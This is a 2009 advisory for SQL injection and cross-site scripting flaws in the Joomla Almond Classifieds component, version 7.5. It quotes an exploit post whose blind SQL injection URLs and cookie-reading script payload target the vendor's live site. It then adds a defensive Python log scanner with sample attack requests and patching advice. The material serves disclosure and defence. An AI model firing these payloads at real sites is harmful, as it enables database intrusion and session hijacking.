
28.07.2009, 17:48
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting
Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.
1) Input passed via the "replid" parameter to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 7.5. Other versions may also be affected.
Code:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ /___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ Joomla Almond Classifieds v.7.5 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.almondsoft.com ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ OFF ]
[»] Price: [ $195 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> TRUE
[»] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
[»] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
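A defender-side check for the two entry points described in the advisory, added here as an example that is not part of the original post or of the component's code: it scans web access logs for requests where "replid" is not a plain integer or where "addr" carries HTML metacharacters. The log format (Apache combined style), the function names and the sample log lines are assumptions made up for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (illustrative only, not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jul/2009:17:40:01 +0000] "GET /index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Jul/2009:17:41:12 +0000] "GET /index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+and+1%3D1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/Jul/2009:17:42:30 +0000] "GET /components/com_aclassf/gmap.php?addr=10+Main+St%2C+Springfield HTTP/1.1" 200 900',
    '203.0.113.9 - - [28/Jul/2009:17:43:02 +0000] "GET /components/com_aclassf/gmap.php?addr=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 910',
]

# Pulls the request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")
HTML_META_RE = re.compile(r'[<>"]')


def classify(line):
    """Return a list of findings for one log line (empty list if clean)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    # Issue 1: replid is used in an SQL query, so it should only ever be an integer.
    if url.path.endswith("/index.php") and params.get("option") == ["com_aclassf"]:
        if any(not INTEGER_RE.fullmatch(v) for v in params.get("replid", [])):
            findings.append("replid-not-integer")
    # Issue 2: addr is echoed back by gmap.php, so markup characters are suspicious.
    if url.path.endswith("/components/com_aclassf/gmap.php"):
        if any(HTML_META_RE.search(v) for v in params.get("addr", [])):
            findings.append("addr-html-metachar")
    return findings


def scan(lines):
    """Map 1-based line numbers to findings, keeping only flagged lines."""
    flagged = {}
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            flagged[number] = findings
    return flagged


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, findings)
```

The same two conditions are what a fix in the component would enforce server-side: cast "replid" to an integer before it reaches the query, and HTML-encode "addr" before it is written into the page.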